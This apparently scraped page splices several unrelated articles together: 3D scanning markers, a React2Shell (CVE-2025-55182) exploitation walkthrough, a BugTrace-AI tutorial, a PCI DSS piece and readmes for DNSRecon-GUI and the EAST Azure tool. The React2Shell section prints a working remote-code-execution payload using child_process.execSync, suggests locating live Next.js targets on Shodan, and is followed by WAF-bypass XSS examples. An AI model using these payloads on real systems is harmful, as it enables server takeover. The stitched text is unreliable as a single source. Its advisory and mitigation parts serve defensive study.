3D scanners rely on being able to identify physical features of an object, and line up what it saw a moment ago with what it sees now in order to build a 3D model. However, not every object is as distinct and visible as others at all angles, particularly in IR. One solution is reflective scanning markers, which are either pre-printed on a mat, or available as stickers that can be applied to objects to give the scanner a bit more to latch onto, visually speaking.
Magnetic mounts allow mixing and matching, as well as attaching directly to some objects to be scanned.
The main advantage (besides not having to remove stickers from the object afterwards) is that these printed markers present the reflective dots at a variety of angles during the scanning process. This makes the scene less sensitive to scanner angle in general, which is good because the angle needed to capture an important feature of an object is not always the angle at which the markers respond best.
By giving the scene more structure, the scanner can have a better shot at scanning reliably even if the reflectors aren't on the target object itself. It also helps by making it easier to combine multiple scans. The more physical features scans have in common, the easier it is to align them.
Just to be clear, using these means one will, in effect, be 3D scanning the markers along with the target object. But once all the post-processing is done, one simply edits the model to remove everything except the target object.
[firstgizmo]'s DIY magnetic 3D scanning markers are an expanded take on an idea first presented by [Payo], who demonstrates the whole concept wonderfully in the video below.
3D scanning can be tremendously handy but it does have its quirks and limitations, and a tool like this can be the difference between a terrible scan and a serviceable one. For a quick catch-up on 3D scanning and its strengths and limitations, read our hands-on tour of using an all-in-one 3D scanner.
In our industry, we often see serious security flaws that change everything overnight. React2Shell is one of those flaws. On December 3, 2025, security researchers found CVE-2025-55182, a critical bug with a perfect 10.0 severity score that affects React Server Components and Next.js applications. Within hours of going public, hackers started using this bug to break into IoT devices and web servers on a massive scale. By December 8, security teams saw widespread attacks targeting companies across multiple industries, from construction to entertainment.
What makes React2Shell so dangerous is how simple it is to use. Attackers only need to send one malicious HTTP request to take complete control of vulnerable systems. No complicated steps, no extra work required, just one carefully crafted message and the attacker owns the target.
In this article, we'll explore the roots of React2Shell and how we can exploit this vulnerability in IoT devices.
The Technical Mechanics of React2Shell
React2Shell takes advantage of how React Server Components handle the React Flight protocol. React Flight is what moves the framework's server-side components around; you can think of it as the language that React Server Components use to communicate. When we talk about deserialization vulnerabilities like React2Shell, we're talking about data that's supposed to be formatted a certain way being misread by the code that receives it. To learn more about deserialization, check our previous article.
Internally, the deserialization payload takes advantage of how React handles Chunks, which are basic building blocks that define what React should render, display, or run. A chunk is basically a building block of a web page, a small piece of data that the server evaluates to render or process the page on the server instead of in the browser. Essentially, all these chunks are put together to build a complete web page with React.
In this vulnerability, the attacker crafts a Chunk that includes a then method. When React Flight sends this data to React Server Components, React treats the value as thenable, something that behaves like a Promise. Promises are essentially a way for code to say it does not have a result yet but will run some code and provide the result later. React's automatic handling, or rather misinterpretation, of these promise-like values is what this exploit abuses.
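To see why that matters, here is a minimal, self-contained sketch in plain JavaScript (not React's actual internals): any object that exposes a then method is treated like a Promise by await, so whatever code lives in that then method runs automatically.

// Illustrative only: any object with a .then method is "thenable",
// and await will invoke that method as though it were a real Promise.
const fake = {
  then(resolve) {
    console.log("code inside then() runs automatically");
    resolve("done");
  }
};

(async () => {
  const result = await fake; // JavaScript calls fake.then() here
  console.log(result);       // prints "done"
})();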
Implementation of Chunk.prototype.then from the React source
Chunks are referenced with the $@ token, and the attacker has figured out a way to express state within the request forged to the server. With a status of resolved_model, the attacker tricks React Flight into thinking that it has already fulfilled the data in chunk zero. Essentially, the attacker has forged the lifecycle of the request to be further along than it actually is. Because React Server Components resolve this as thenable due to the then method, it leads down a code path which eventually executes malicious code.
When Chunk 1 is evaluated, React observes that it is thenable, meaning it appears to be a promise. It will refer to Chunk 0 and then attempt to resolve the forged then method. Since the attacker now controls the then resolution path, React Server Components have been tricked into a code path over which the attacker has ultimate control. When formData.get is set to a value which resolves to a constructor, React treats that field as a reference to a constructor function that it should hydrate while processing the blob value. This becomes critical because $B values are rehydrated by React, and rehydration must invoke the constructor.
This makes $B the execution pivot. By compelling React to hydrate a Blob-like value, React is forced to execute the constructor that the attacker smuggled into formData.get. Since that constructor resolves to the malicious thenable function, React executes the code as part of its hydration process. Lastly, by defining the _prefix primitive, the attacker prepends malicious code onto the executable code path. By appending two forward slashes to the payload, the attacker tells JavaScript to treat the rest of the line as a comment, so only the attacker's code executes and syntax errors are avoided, quite similar to SQL injection.
Fire Up the PoC
Before working with the exploit, let's go to Shodan and see how many active sites on Next.js it has indexed.
As you can see, the query http.component:"Next.js" 200 country:"ru" returned more than a thousand results. But of course, not all of them are vulnerable. To check, we can use the following template for Nuclei.
id: cve-2025-55182-react2shell

info:
  name: Next.js/React Server Components RCE (React2Shell)
  author: assetnote
  severity: critical
  description: |
    Detects CVE-2025-55182 and CVE-2025-66478, a Remote Code Execution vulnerability in Next.js applications using React Server Components.
    It attempts to execute 'echo $((1337*10001))' on the server. If successful, the server returns a redirect to '/login?a=13371337'.
  reference:
    - https://github.com/assetnote/react2shell-scanner
    - https://slcyber.io/research-center/high-fidelity-detection-mechanism-for-rsc-next-js-rce-cve-2025-55182-cve-2025-66478
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cve-id:
      - CVE-2025-55182
      - CVE-2025-66478
  tags: cve, cve2025, nextjs, rce, react

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
        Next-Action: x
        X-Nextjs-Request-Id: b5dce965
        X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad

        ------WebKitFormBoundaryx8jO2oVc6SWP3Sad
        Content-Disposition: form-data; name="0"

        {"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('echo $((1337*10001))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
        ------WebKitFormBoundaryx8jO2oVc6SWP3Sad
        Content-Disposition: form-data; name="1"

        "$@0"
        ------WebKitFormBoundaryx8jO2oVc6SWP3Sad
        Content-Disposition: form-data; name="2"

        []
        ------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "/login?a=13371337"
          - "X-Action-Redirect"
        condition: and
Next, this command will show whether the web application is vulnerable.
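Assuming the template above is saved as cve-2025-55182-react2shell.yaml (the filename is our choice here), a typical invocation would look something like this:

nuclei -t cve-2025-55182-react2shell.yaml -u https://target.example

A match on the /login?a=13371337 redirect header means the arithmetic test actually ran on the server, which is a strong signal the target is exploitable.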
In addition, on GitHub you can find scanners in different programming languages that do exactly the same thing. Here is an example of a solution from Malayke:
You can create a test environment for this vulnerability with just a few commands:
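The exact commands were shown in the original screenshot; based on the description below, they look something like this:

npx create-next-app@16.0.6 my-cve-2025-66478-app
cd my-cve-2025-66478-app
npm run dev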
The commands above create a new Next.js application named my-cve-2025-66478-app using version 16.0.6 of the official setup tool, without installing anything globally. If you open localhost:3000 in your browser, you will see the following.
At this stage, we can proceed to exploit the vulnerability. Open your preferred web proxy, such as Burp Suite or ZAP. In this case, I will be using Caido (if you have not used it before, you can familiarize yourself with it in the following articles).
The algorithm is quite simple: we need to catch the request to the site and redirect it to Replay.
After that, we need to change the request from GET to POST and add a payload. The overall request looks like this:
Security researchers have identified multiple instances of React2Shell attacks across different systems. The similar patterns observed in these cases reveal how the attacker operates and which tools they use, at least during the early days following the vulnerability's disclosure.
In the first case, on December 4, 2025, the attacker broke into a vulnerable Next.js system running on Windows and tried to download an unknown file using curl and bash commands. They then tried to download a Linux cryptocurrency miner. About 6 hours later, they tried to download a Linux backdoor. The attackers also ran commands like whoami and echo, which researchers believe was a way to test if commands would run and figure out what operating system was being used.
In the second case, on another Windows computer, the attacker tried to download multiple files from their control servers. Interestingly, the attacker ran the command ver || id, which is a trick to figure out if the system is running Windows or Linux. The ver command shows the Windows version, while id shows user information on Linux. The double pipe operator makes sure the second command only runs if the first one fails, letting the attacker identify the operating system. Like before, the attacker also ran a command to test if their code would run, followed by commands like whoami and hostname to gather user and system information.
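A quick way to see the trick in action:

# On Windows, "ver" succeeds and prints the OS version, so "id" never runs.
# On Linux, "ver" fails (command not found), so "id" runs and prints the user's identity.
ver || id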
In the third case, the attacker followed the same pattern. They first ran commands to test if their code would work and used commands like whoami to gather user information. The attacker then tried to download multiple files from their control servers. The commands follow the same approach: download a shell script, run it with bash, and sometimes delete it to hide evidence.
Unlike the earlier Windows cases, the fourth case targeted a Linux computer running a Next.js application. The attacker successfully broke in and installed an XMRig cryptocurrency miner.
Based on the similar pattern seen across multiple computers, including identical tests and control servers, researchers believe the attacker is likely using automated hacking tools. This is supported by the attempts to use Linux-specific files on Windows computers, showing that the automation doesn't tell the difference between operating systems. On one of the hacked computers, log analysis showed evidence of automated vulnerability scanning before the attack. The attacker used a publicly available GitHub tool to find vulnerable Next.js systems before launching their attack.
RondoDox Campaign
Security researchers have found a nine-month campaign targeting IoT devices and web applications to build a botnet called RondoDox. This campaign started in early 2025 and has grown through three phases, each one bigger and more advanced than the last.
The first phase ran from March through April 2025 and involved early testing and manual scanning for vulnerabilities. During this time, the attackers were testing their tools and looking for potential targets across the internet. The second phase, from April through June 2025, saw daily mass scanning targeting web applications like WordPress, Drupal, and Struts2, along with IoT devices such as Wavlink routers. The third phase, starting in July and continuing through early December 2025, marked a shift to hourly automated attacks on a large scale, showing the operators had improved their tools and were ready for mass attacks.
When React2Shell was disclosed in December 2025, the RondoDox operators immediately added it to their toolkit alongside other N-day vulnerabilities, including CVE-2023-1389 and CVE-2025-24893. The attacks detected in December follow a consistent pattern. Attackers scan to find vulnerable Next.js servers, then try to install multiple payloads on infected devices. These payloads include cryptocurrency miners, botnet loaders, health checkers, and Mirai botnet variants. The infection chain is designed to stay on systems and resist removal attempts.
A large portion of the attack traffic comes from a datacenter in Poland, with one IP address alone responsible for more than 12,000 React2Shell-related events, along with port scanning and attempts to exploit known Hikvision vulnerabilities. This behavior matches patterns seen in Mirai-derived botnets, where compromised infrastructure is used both for scanning and for launching multi-vector attacks. Additional scanning comes from the United States, the Netherlands, Ireland, France, Hong Kong, Singapore, China, Panama, and other regions, showing broad global participation in opportunistic attacks.
Mitigation
CVE-2025-55182 exists in several versions of the following packages, including 19.0, 19.1.0, 19.1.1, and 19.2.0: react-server-dom-webpack, react-server-dom-parcel, and react-server-dom-turbopack. Businesses relying on any of these impacted packages should update immediately.
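To check whether an application pulls in an affected package, one quick approach (shown here for the webpack variant; the same applies to the parcel and turbopack packages) looks like this:

# show the installed version of the affected package
npm ls react-server-dom-webpack

# then upgrade to a patched release; consult the official React advisory
# for the exact fixed version numbers
npm update react-server-dom-webpack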
Summary
Cyberwarriors need to make sure their systems are safe from new threats. The React2Shell vulnerability is a serious risk for organizations using React Server Components and Next.js applications. Hackers can exploit this vulnerability to steal personal data, corporate data, and attack critical infrastructure by installing malware. This vulnerability is easy to exploit, and many organizations use the affected software, which has made it popular with botnet operators who've quickly added React2Shell to their attack tools. Organizations need to patch right away, use multiple layers of defense, and watch their systems closely to protect against this threat. A vulnerability like React2Shell can take down entire networks if even one application is exposed.
Welcome back, aspiring cyberwarriors and AI enthusiasts!
AI is stepping up in every aspect of our cybersecurity job: STRIDE-GPT generates threat models and mitigations for them, BruteForceAI helps with password attacks, and LLM-Tools-Nmap conducts reconnaissance. Today, it's time to explore AI-powered vulnerability scanning.
In this article, we'll cover the BugTrace-AI toolkit from installation through advanced usage. We'll begin with setup and configuration, then explore each of the core analysis tools, including URL analysis, code review, and security header evaluation. Let's get rolling!
What Is BugTrace-AI?
BugTrace-AI leverages Generative AI to understand context, identify logic flaws, and provide intelligent recommendations that adapt to each unique situation. The tool performs non-invasive reconnaissance and analysis, generating hypotheses about potential vulnerabilities that serve as starting points for manual investigation.
The platform integrates both Static Application Security Testing (SAST) and Dynamic Application Security Testing (DAST) within a single interface. It supports multiple AI models through OpenRouter, including Google Gemini, Anthropic Claude, and many more.
It's important to recognize that this tool functions as an assistant rather than an automated exploitation tool. With that in mind, all findings should be deliberately validated.
Step #1: Installation
First of all, we need to clone the repository from GitHub:
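The repository URL itself appeared in the original screenshot, so the path below is a placeholder; substitute the actual project URL:

kali> git clone https://github.com/<author>/BugTrace-AI.git
kali> cd BugTrace-AI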
After listing the content of the downloaded directory, we can see the script we need: dockerizer.sh. We need to add execution permissions and launch it.
kali> chmod +x dockerizer.sh
kali> sudo ./dockerizer.sh
At this point, you may encounter an issue with the script, as it is incompatible with Docker Compose version 2 at the time of writing. To fix it, you can edit the script manually or use the following:
#!/bin/bash
set -e

COMPOSE_FILE="docker-compose.yml"

echo "--- Stopping any previous containers... ---"
docker compose -f "$COMPOSE_FILE" down -v || \
  echo "Warning: 'docker compose down' failed. This might be the first run, which is okay."

echo "--- Building and starting the application... ---"
docker compose -f "$COMPOSE_FILE" up --build -d

echo "--- Application is now running! ---"
echo "Access it at: http://localhost:6869"
echo "To stop the application, run: docker compose -f $COMPOSE_FILE down"

# === Try to launch Firefox with checks ===
sleep 3 # Give the container a moment to start

if [ -z "$DISPLAY" ]; then
  echo "⚠️ No GUI detected (DISPLAY is not set)."
  echo "💡 Open http://localhost:6869 manually in your browser."
elif ! command -v firefox &> /dev/null; then
  echo "⚠️ Firefox is not installed."
  echo "💡 Install it with: sudo apt install firefox"
else
  echo "🚀 Launching Firefox..."
  firefox http://localhost:6869 &
fi
After updating the script, you should see the process of building the Docker image and starting the container in detached mode.
After finishing, you can now access BugTrace-AI at http://localhost:6869. You will see a disclaimer similar to the one below.
If you accept it, the app will load the main screen.
Step #2: Configuring API Access
BugTrace-AI requires an OpenRouter API key to function. OpenRouter provides unified access to multiple AI models through a single API, making it ideal for this application. Visit the OpenRouter website at https://openrouter.ai and create an account if you don't already have one. Navigate to the API keys section and generate a new key.
In the BugTrace-AI interface, click the Settings icon in the header. This opens a modal where you can enter your API key.
Step #3: Understanding the Three Scan Modes
BugTrace-AI offers three URL analysis modes, each designed for different scenarios and authorization levels.
The Recon Scan focuses entirely on passive reconnaissance. It analyzes the URL structure looking for patterns that might indicate vulnerabilities, performs technology fingerprinting using public databases, searches CVE databases for vulnerabilities in identified technologies, and checks public exploit databases like Exploit-DB for available exploits. This mode never sends any traffic to the target beyond the initial page load.
The Active Scan analyzes URL patterns and parameters to hypothesize vulnerabilities. Despite its name, this mode remains "simulated active" because it doesn't actually send attack payloads. Instead, it uses AI reasoning to identify URL patterns that commonly correlate with vulnerabilities. For example, URLs with parameters named "id" or "user" might be susceptible to SQL injection, while parameters that appear in the page output could be vulnerable to XSS. The AI generates hypotheses about potential vulnerabilities based on these patterns and guides how to test them manually.
The Grey Box Scan combines DAST with SAST by analyzing the pageβs live JavaScript code. After loading the target URL, the tool extracts all JavaScript code from the page, including inline scripts and external files. The AI then performs static analysis on this JavaScript, looking for client-side vulnerabilities, hardcoded secrets or API keys, insecure data handling patterns, and client-side logic flaws.
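To picture what that static pass is hunting for, here is a hypothetical inline script of the kind a Grey Box scan would flag (the endpoint and key below are made up):

// Hypothetical client-side code with a hardcoded secret
const API_KEY = "sk_live_EXAMPLE_ONLY"; // secret shipped to every visitor's browser
fetch("https://api.example.com/orders?key=" + API_KEY)
  .then(r => r.json())
  .then(data => console.log(data));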
For this exercise, we'll analyze a web application with the third mode.
The tool generates a report summarizing its findings.
BugTrace-AI highlights possible vulnerabilities and suggests what to test manually based on what it finds. You can also review all results with the Agent, which remembers context so you can ask follow-up questions about earlier findings or how to verify them.
Step #4: Payload Generation Tools
Web Application Firewalls (WAFs) attempt to block malicious requests by detecting attack patterns. The Payload Forge helps bypass WAF protections by generating payload variations using obfuscation and encoding techniques.
The tool generates a few dozen payloads. Each of them includes an explanation of the obfuscation technique used and the specific WAF detection methods itβs designed to evade.
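For example, a plain XSS probe such as <script>alert(1)</script> might come back as case-mangled or URL-encoded variants like <ScRiPt>alert(1)</ScRiPt> or %3Cscript%3Ealert(1)%3C%2Fscript%3E, each targeting a different class of signature-based filter. These particular variants are generic illustrations of the technique, not the tool's literal output.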
Besides that, BugTrace-AI offers SSTI payload suggestions and an OOB Interaction Helper.
Summary
BugTrace-AI is a next-generation vulnerability scanning tool. Unlike traditional scanners that rely on rule-based detection, BugTrace-AI focuses on understanding the logic and context of its target.
In this article, we installed the tool and tested some of its features. But this is not a comprehensive guide; BugTrace-AI offers many more capabilities designed to make cybersecurity work easier. We encourage you to install the tool and explore its full potential on your own. Keep in mind that it is not an all-in-one solution, and every finding should be manually verified.
If you want to dive deeper into using AI for hacking, consider checking out the AI for Cybersecurity training. This 7-hour video course, led by Master OTW, is designed to take your understanding and practical use of artificial intelligence to the next level.
Did you know that there are approximately 12.52 million credit card users in Australia, along with 43.77 million actively issued debit cards? These figures reflect Australiaβs heavy reliance on digital payments and card-based transactions for everyday purchases and online commerce. However, with this widespread adoption comes an equally significant risk which is the growing threat of data breaches and payment fraud.
As digital transactions continue to grow, so do the challenges of protecting sensitive customer data. This is where PCI DSS (Payment Card Industry Data Security Standard) compliance becomes essential for Australian businesses.
In today's article, we are going to learn how PCI DSS compliance protects businesses from data breaches. So, if you are wondering why you should invest in PCI DSS compliance in Australia and how it can safeguard your organization, keep reading to find out.
A brief introduction to PCI DSS
PCI DSS is a global data security framework that protects businesses handling cardholder data (CHD) from data breaches, fraud, and identity theft. It was first introduced in December 2004 by its founding members: American Express, Discover, JCB, MasterCard, and Visa International.
PCI DSS applies to any and every organization, regardless of size, that accepts, processes, stores, or transmits payment card data. Its framework consists of 12 core PCI DSS requirements grouped into six control objectives, which include:
Building and maintaining a secure network: Implementing firewalls and secure configurations.
Protecting cardholder data: Encrypting sensitive data during transmission.
Maintaining a vulnerability management program: Regularly updating anti-virus software and conducting vulnerability scans.
Implementing strong access control measures: Limiting access to cardholder data based on job responsibilities.
Regular monitoring and testing of networks: Performing routine security assessments.
Maintaining an information security policy: Establishing a documented security strategy.
The latest version, PCI DSS v4.0, was released on March 31, 2022, introducing enhanced security measures to address evolving cyber threats. These updates include increased flexibility for businesses and stronger authentication requirements, ensuring better protection in today's dynamic digital landscape.
You may also check our latest YouTube video on PCI DSS 4.0 requirements which explains the changes from version 3.2.1 to 4.0.
The growing threat of data breaches in Australia
As Australiaβs digital landscape continues to expand, the frequency and severity of data breaches are becoming increasingly concerning. In fact, the landscape of data security in Australia is becoming alarmingly dangerous, with a significant rise in data breaches posing a growing threat to businesses and individuals alike.
In the first quarter of 2024 alone, around 1.8 million accounts were leaked, a 388% increase in compromised user accounts. This marks the severity of data breaches driven by rapidly expanding technology adoption and compliance negligence.
The financial implications of these breaches are profound. According to IBM's annual Cost of a Data Breach Report 2024, the average cost of a data breach in Australia is estimated at AUD $4.26 million, which is said to have increased by 27% since 2020. These breaches not only affect an organization's financial stability but also damage its reputation and erode customer trust. As cybercriminals continue to evolve their tactics, businesses must prioritize strong cybersecurity measures to mitigate these risks.
This is where the PCI DSS comes into play. While PCI DSS is not mandated by the Australian government, it is considered an important industry standard enforced by payment card brands. Achieving PCI DSS compliance ensures strong protection of sensitive payment data, reducing the risk of breaches and associated penalties. Moreover, compliance demonstrates your commitment to cybersecurity, boosting customer confidence in your business.
How PCI DSS protects your business from data breaches
PCI DSS provides a comprehensive framework that helps businesses defend against data breaches and payment fraud by implementing security measures specifically designed for handling payment card data. Hereβs how PCI DSS compliance safeguards Australian businesses:
1. Encryption of payment card data
One of the key requirements of PCI DSS is the encryption of cardholder data both in transit and at rest. This ensures that even if cybercriminals manage to intercept the data, they will not be able to decrypt it and misuse it. By implementing robust encryption, businesses can significantly reduce the likelihood of their payment card data being exposed during a breach.
2. Secure network architecture
PCI DSS mandates businesses to establish and maintain a secure network with firewalls and other security configurations to protect against unauthorized access. By isolating payment card systems from the rest of the corporate network, businesses can minimize vulnerabilities and reduce the risk of data breaches.
3. Regular vulnerability scanning and penetration testing
PCI DSS requires ongoing vulnerability scans and penetration testing to identify and remediate potential security flaws before they can be exploited. This proactive approach ensures that systems are continuously evaluated for weaknesses and can quickly adapt to emerging cyber threats.
4. Access control and authentication
PCI DSS enforces stringent access control measures, ensuring that only authorized personnel can access sensitive payment card data. Through multi-factor authentication (MFA) and role-based access controls, businesses can limit exposure to potential breaches by restricting access based on job responsibilities.
5. Monitoring and logging
Constant monitoring and logging of payment systems are essential for detecting suspicious activities and mitigating data breaches. PCI DSS requires businesses to log all access and activities involving payment card data, which can be used to identify anomalies and investigate potential breaches swiftly.
6. Security awareness and staff training
Employees are often the weakest link in cybersecurity. PCI DSS emphasizes the importance of regular security training to ensure staff members understand the latest threats and best practices for safeguarding payment data. This fosters a culture of security within the organization and helps prevent human errors that could lead to breaches.
To Conclude
The rising threat of data breaches in Australia underscores the critical importance of robust cybersecurity practices. For businesses handling payment card data, PCI DSS compliance is a vital step toward safeguarding sensitive information, building customer trust, and mitigating financial and reputational risks. By adopting this globally recognized framework, organizations can strengthen their security posture and stay resilient against evolving cyber threats.
DNSRecon is a DNS scanning and enumeration tool written in Python, which allows you to perform different tasks, such as enumeration of standard records for a defined domain (A, NS, SOA, and MX) and top-level domain expansion for a defined domain.
With this graph-oriented user interface, the different records of a specific domain can be observed, classified and ordered in a simple way.
Install
git clone https://github.com/micro-joan/dnsrecon-gui
cd dnsrecon-gui/
chmod +x run.sh
./run.sh
After executing the application launcher, all required components must be installed. The launcher will check them one by one, and for any component that is not installed it will show you the command you must enter to install it:
Use
When the tool is ready to use, the installer will give you a URL to open in a private browser window. Every time you do a new search, open a new private window or clear your browser cache so the graphs refresh.
This toolkit contains materials that can be potentially damaging or dangerous for social media. Refer to the laws in your province/country before accessing, using, or in any other way utilizing this in a wrong way.
This Tool is made for educational purposes only. Do not attempt to violate the law with anything contained here. If this is your intention, then Get the hell out of here!
Extensible Azure Security Tool (later referred to as EAST) is a tool for assessing Azure and, to some extent, Azure AD security controls. The primary use case of EAST is security data collection for evaluation in Azure assessments. This information (JSON content) can then be used in various reporting tools, which we use to further correlate and investigate the data.
Installation now accounts for the use of Azure Cloud Shell's updated version with regard to dependencies (Cloud Shell now has Node.js v16 installed)
Checking of Databricks cluster types as per advisory
Audits Databricks clusters for potential privilege elevation. This control typically requires permissions on the Databricks cluster.
content.json now has key- and content-based sorting. This enables delta checks with git diff HEAD^1 ¹, as content.json has a predetermined order of results (a minimal example follows below)
¹ Word of caution: if you want to check deltas of content.json, then content.json will need to be "unignored" from .gitignore, exposing results to any upstream you might have configured.
Use this feature with caution, and ensure you don't have public upstream set for the branch you are using this feature for
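A minimal sketch of such a delta check, assuming content.json is committed to the repository after each run:

# commit the fresh results, then compare them with the previous run
git add content.json
git commit -m "EAST scan results"
git diff HEAD^1 -- content.json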
Changed programming patterns to avoid possible race conditions with larger datasets. This mostly means changing var to let in for await-style loops
Important
Current status of the tool is beta
Fixes, updates, etc. are done on a "best effort" basis, with no guarantee of timing or of the quality of the fix applied
We do some additional tuning before using EAST in our daily work, such as applying various run and environment restrictions, besides familiarizing ourselves with the environment in question. Thus, we currently recommend that EAST is run only in test environments, and with read-only permissions.
All the calls made by the tool go largely to Azure cloud IPs, so it should work well in hardened environments where outbound IP restrictions are applied. This reduces the risk of the tool containing malicious packages which could "phone home", since doing so would also require C2 infrastructure in Azure.
Essentially, running it in read-only mode reduces a lot of the risk associated with possibly compromised NPM packages (Google compromised NPM)
Bugs etc.: You can protect your environment against certain mistakes in this code by running the tool with Reader-only permissions
A lot of the code is "AS IS", meaning it has served only the purpose of creating a certain result; a lot of cleaning up and modularizing remains to be finished
There are no tests at the moment, apart from certain manual checks that are run after changes to main.js and various more advanced controls.
The control descriptions are not the final product at this stage, so feedback on them, while appreciated, is not the focus of the tooling right now
As the name implies, we use it as a tool to evaluate environments. It is not meant to be run unmonitored for the time being, and should not be run in any internet-exposed service that accepts incoming connections.
Documentation could be described as incomplete for the time being
EAST is mostly focused on PaaS resources, as most of our Azure assessments focus on this resource type
No input sanitization is performed on launch params, as it is always assumed that the input of these parameters is controlled. That being said, the tool uses exec() extensively; while I have not reviewed all paths, I believe that achieving shell command execution is trivial. This tool does not assume hostile input, so the recommendation is that you don't paste launch arguments into the command line without reviewing them first.
Tool operation
Dependencies
To reduce the amount of code, the following dependencies are used for operation and aesthetics (kudos to the maintainers of these fantastic packages)
Other dependencies for running the tool (if you are planning to run this in Azure Cloud Shell, you don't need to install Azure CLI):
This tool does not include or distribute Microsoft Azure CLI, but rather uses it when it has been installed on the source system (Such as Azure Cloud Shell, which is primary platform for running EAST)
Azure Cloud Shell (BASH) or applicable Linux Distro / WSL
// Example control logic: the resource is marked healthy when its admin user is disabled
if (item.properties?.adminUserEnabled === false) { returnObject.isHealthy = true }
Advanced
Advanced controls include checks beyond the initial ARM object, often invoking new requests to get further information about the resource in scope and its relation to other services.
Example: Role Assignments
Besides checking the role assignments of the subscription, an additional check is performed via Azure AD Conditional Access reporting for MFA, verifying that privileged accounts are not protected only by passwords (SPNs with client secrets)
Azure Data Factory pipeline mapping ties pipelines -> activities -> data targets together, and then checks the run history of those activities for secrets leaked into the logs.
Composite
Composite controls combine two or more control results from the pipeline in order to form one or more new controls. Using composites solves two use cases for EAST:
You can't guarantee the order of control results being returned in the pipeline
You need to return more than one control result from a single check
Get alerts from Microsoft Cloud Defender on subscription check
Form new controls per resourceProvider for alerts
Reporting
EAST is not focused on providing automated report generation; it mostly provides JSON files with control and evaluation status. The idea is to use separate tooling to create reports, which is fairly trivial to automate via markdown creation scripts and tools such as Pandoc
While the focus is not on reporting, this repo includes example automation for report creation with pandoc to ease reading of the results in a single-document format.
cff-version: 1.2.0
title: Pandoc
message: "If you use this software, please cite it as below."
type: software
url: "https://github.com/jgm/pandoc"
authors:
  - given-names: John
    family-names: MacFarlane
    email: jgm@berkeley.edu
    orcid: 'https://orcid.org/0000-0003-2557-9090'
  - given-names: Albert
    family-names: Krewinkel
    email: tarleb+github@moltkeplatz.de
    orcid: '0000-0002-9455-0796'
  - given-names: Jesse
    family-names: Rosenthal
    email: jrosenthal@jhu.edu
Running EAST scan
This part contains a guide on how to run this either on BASH@linux or BASH on Azure Cloud Shell (obviously Cloud Shell is Linux too, but it does not require that you have your own Linux box)
⚠️ If you are running the tool in Cloud Shell, you might need to reapply some of the installations as Cloud Shell does not persist various session settings.
Detailed prerequisites (this is if you opted not to do the "fire and forget" version)
Prerequisites
git clone https://github.com/jsa2/EAST --branch preview
cd EAST; npm install
Pandoc installation on cloud shell
# Get pandoc for reporting (first time only)
wget "https://github.com/jgm/pandoc/releases/download/2.17.1.1/pandoc-2.17.1.1-linux-amd64.tar.gz"
tar xvzf "pandoc-2.17.1.1-linux-amd64.tar.gz" --strip-components 1 -C ~
Installing pandoc on distros that support APT
# Get pandoc for reporting (first time only)
sudo apt install pandoc
Log in to Az CLI and run the scan
# Relogin is required to ensure token cache is placed on session on cloud shell
az account clear
az login
# cd EAST
# replace the subid below with your subscription ID!
subId=6193053b-408b-44d0-b20f-4e29b9b67394

node ./plugins/main.js --batch=10 --nativescope=true --roleAssignments=true --helperTexts=true --checkAad=true --scanAuditLogs --composites --subInclude=$subId
Generate report
cd EAST; node templatehelpers/eastReports.js --doc
If you want to include all Azure Security Benchmark results in the report
cd EAST; node templatehelpers/eastReports.js --doc --asb
Share relevant controls across multiple environments as a community effort
Company use
Companies have the possibility to develop company-specific controls which apply to their specific work. Companies can then control these implementations by deciding whether or not to share them, based on the operating principles of that company.
Non IPR components
Code logic and functions are under the MIT license. Since code logic and functions are already based on open-source components & vendor APIs, it does not make sense to restrict something that is already based on open source
If you use this tool as part of your commercial effort, we only require that you follow the very relaxed terms of the MIT license
Use the rich and maintained context of Microsoft Azure CLI login & commands with Node.js control flow, which supplies enhanced REST requests and maps results to a schema.
This tool does not include or distribute Microsoft Azure CLI, but rather uses it when it has been installed on the source system (Such as Azure Cloud Shell, which is primary platform for running EAST)
✅ Using the Node.js runtime as orchestrator utilises Node's asynchronous nature, allowing batching of requests. Batching of requests utilizes the full extent of Azure Resource Manager's incredible speed.
✅ Compared to running requests one by one, the speedup can be up to 10x when Node executes a batch of requests instead of a single request at a time
Param | Description | Default if undefined
(param name not captured) | Clears tokens in the session folder. Use this if you get authorization errors, or have just changed to another az login account. Use az account clear if you want to clear the AZ CLI cache too. | no values
--tag | Filter all results at the end based on a single tag, e.g. --tag=svc=aksdev | no values
--ignorePreCheck | Use this option with browser delegated tokens | no values
--helperTexts | Will append text descriptions from general to manual controls | no values
--reprocess | Will update results in the existing content.json. Useful for incremental runs | no values
Parameters reference for the example report:

node templatehelpers/eastReports.js --asb

Param | Description | Default if undefined
--asb | Gets all ASB results available to users | no values
--policy | Gets all Policy results available to users | no values
--doc | Prints the pandoc string for export to the console | no values
(Highly experimental) Running in restricted environments where only browser use is available
⚠️ Detects principals in privileged subscription roles protected only by password-based single-factor authentication.
Checks for users without MFA policies applied for a set of conditions
Checks for service principals protected only by a password (as opposed to using a certificate credential, workload federation, and/or a workload identity CA policy)
An unused credential on an application can result in a security breach. While it's convenient to use password secrets as a credential, we strongly recommend that you use x509 certificates as the only credential type for getting tokens for your application
The following methods work for contributing for the time being:
Submit a pull request with code / documentation change
Submit an issue
An issue can be a:
⚠️ Problem (issue)
Feature request
Question
Other
By default, EAST tries to work with the current dependencies. Introducing new (direct) dependencies is not directly encouraged with EAST. If such a vital dependency is introduced, then review the licensing of that dependency and update readme.md (dependencies)
There is nothing to prevent you from creating your own fork of EAST with your own dependencies